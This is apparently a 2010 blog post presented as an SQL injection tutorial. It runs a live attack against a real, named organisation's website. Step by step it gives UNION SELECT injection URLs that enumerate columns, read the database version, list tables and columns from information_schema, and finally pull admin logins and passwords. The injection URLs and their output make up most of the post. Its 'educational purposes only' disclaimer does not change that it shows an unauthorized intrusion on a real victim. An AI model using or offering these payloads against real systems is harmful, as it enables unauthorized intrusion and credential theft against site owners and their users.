Friday, July 30, 2010

How to use SQL Injection? Best Online Tutorial for SQL Injection

...........................................................................................................................
How to use SQL Injection? Best Online Tutorial for SQL Injection
I receive many emails on how to hack a website using sql injection so, here is the hacking tutorial on it,
[NOTE: This is for educational purpose only.]

This is practical tutorial...! as long as this .pk site is up !

So lets start.. Hers is the website on which this live testing was done: http://www.depo.org.pk

Try to Find variables passing to inner script...

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Where &id= is variable passing values to sql

Check whether it is vulnerable or Not... Put ' in place of 1 as shown below

depo.org.pk/index.php?a=newsdetail&id='

If it shows error ! Then we can apply sqli on this URL. Now we need to determine numbers of columns in current table.

Increase numbers un-till u get rid of 'The used SELECT statements have a different number of columns

+1
+1,2
+1,2,3
+1,2.3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

 here we get  no error.

Here, we used SQL Functions directly from browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------


user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now, we need to know structure of victim's mysql database

NOTE: SQL stores each column and table information in another table called as 'information_schema'

Attach SQL Query '+from+information_schema.tables+where+table_schem a=database()' @ the ending of column numbers !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables
+where+table_
schema=database()

Now, we want to fatch table structure of database named as 'depo' !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()

Table names

admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now, its turn of column !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

Its time to fetch Id and password from Table Admin !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin

FOR EDUCATIONAL PURPOSES ONLY.
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................

0 comments:

Post a Comment